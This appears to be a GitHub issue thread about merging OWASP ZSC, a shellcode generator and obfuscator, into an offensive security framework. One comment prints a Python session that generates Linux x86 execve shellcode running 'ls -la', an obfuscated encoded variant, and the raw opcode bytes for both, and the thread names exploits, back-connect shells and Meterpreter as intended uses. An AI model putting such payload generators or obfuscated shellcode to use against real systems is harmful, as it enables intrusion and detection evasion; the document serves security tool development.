Join the OWASP ZSC to this framework? #90
Comments
|
Hey, This is a great idea. I also think that OWASP ZSC should be added as a library like the icmp library so that other modules can use it to generate payloads. It would be a great addition to the existing framework. I am currently going through the ZSC code to see the way the modules are written. Best Regards. |
|
Hello, I think first of all adding ZSC to this project is a great idea and we should add ZSC as a library because all the modules will be using that. |
|
Hey, thanks for the comments. @shaddygarg OWASP ZSC codes are a little bit messy, but it has a great document in gitbook. feel free to look it up. let me know if anyone has any ideas and think its cool to make this feature available on this project. Regards. |
|
Hey, I added fist simple library for making a sample in my latest commits. it's easy to use any payload now! the first payload is a shellcode generator for linux_x86 with add_randome (optional) obfuscating method!
In [1]: from lib.payload.shellcode.generator.linux_x86.system.engine import start
In [2]: from lib.payload.shellcode.encoder.linux_x86.system.add_random.engine import start as encode
In [3]: from lib.payload.shellcode.opcoder.linux_x86.engine import convert
In [4]: print(start("ls -la"))
push $0xb
pop %eax
cltd
push %edx
push $0x616c9090
pop %ecx
shr $0x10,%ecx
push %ecx
push $0x2d20736c
mov %esp,%esi
push %edx
push $0x632d9090
pop %ecx
shr $0x10,%ecx
push %ecx
mov %esp,%ecx
push %edx
push $0x68
push $0x7361622f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %edi
push %esi
push %ecx
push %ebx
mov %esp,%ecx
int $0x80
In [5]: print(encode(start("ls -la")))
xor %edx,%edx
push %edx
push $0x71304b6f
pop %ebx
push $0xfc3badf
pop %eax
neg %eax
add %ebx,%eax
push %eax
pop %ecx
shr $0x10,%ecx
push %ecx
push $0x70383849
pop %ebx
push $0x4317c4dd
pop %eax
neg %eax
add %ebx,%eax
push %eax
mov %esp,%esi
push %edx
push $0x69536879
pop %ebx
push $0x625d7e9
pop %eax
neg %eax
add %ebx,%eax
push %eax
pop %ecx
shr $0x10,%ecx
push %ecx
mov %esp,%ecx
push %edx
push $0x68
push $0x7944454c
pop %ebx
push $0x5e2e31d
pop %eax
neg %eax
add %ebx,%eax
push %eax
push $0x79377630
pop %ebx
push $0xace1401
pop %eax
neg %eax
add %ebx,%eax
push %eax
mov %esp,%ebx
push %edx
push %edi
push %esi
push %ecx
push %ebx
mov %esp,%ecx
push $0x9
pop %eax
add $0x02,%eax
cltd
int $0x80
In [6]: print(convert(start("ls -la")))
\x6a\x0b\x58\x99\x52\x68\x90\x90\x6c\x61\x59\xc1\xe9\x10\x51\x68\x6c\x73\x20\x2d\x89\xe6\x52\x68\x90\x90\x2d\x63\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80
In [7]: print(convert(encode(start("ls -la"))))
\x31\xd2\x52\x68\x59\x5a\x55\x6d\x5b\x68\xc9\xc9\xe8\x0b\x58\xf7\xd8\x01\xd8\x50\x59\xc1\xe9\x10\x51\x68\x53\x38\x67\x6a\x5b\x68\xe7\xc4\x46\x3d\x58\xf7\xd8\x01\xd8\x50\x89\xe6\x52\x68\x44\x7a\x33\x7a\x5b\x68\xb4\xe9\x05\x17\x58\xf7\xd8\x01\xd8\x50\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x67\x59\x67\x75\x5b\x68\x38\xf7\x05\x02\x58\xf7\xd8\x01\xd8\x50\x68\x34\x53\x52\x76\x5b\x68\x05\xf1\xe8\x07\x58\xf7\xd8\x01\xd8\x50\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\x6a\x0a\x58\x83\xc0\x01\x99\xcd\x80
In [8]:@pradeepjairamani your password generator could be located in I will add a few documents regarding the shellcodes soon! meanwhile, you can check out OWASP ZSC docs on gitbook. #1 should be updated. |
Hello,
To clarify, OWASP ZSC [1] is open source software written in python which lets you generate customized shellcode and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with python.
Bringing OWASP ZSC to this project may help us to generate the trustable payloads for exploits (vulnerabilities category), also after testing a vulnerability, it could be useful for Back-Connect or Meterpreter.
Whats your idea to join these two projects together? Should OWASP ZSC add az a library or module or the both?
Feel free to share your idea.
Best Regards.
The text was updated successfully, but these errors were encountered: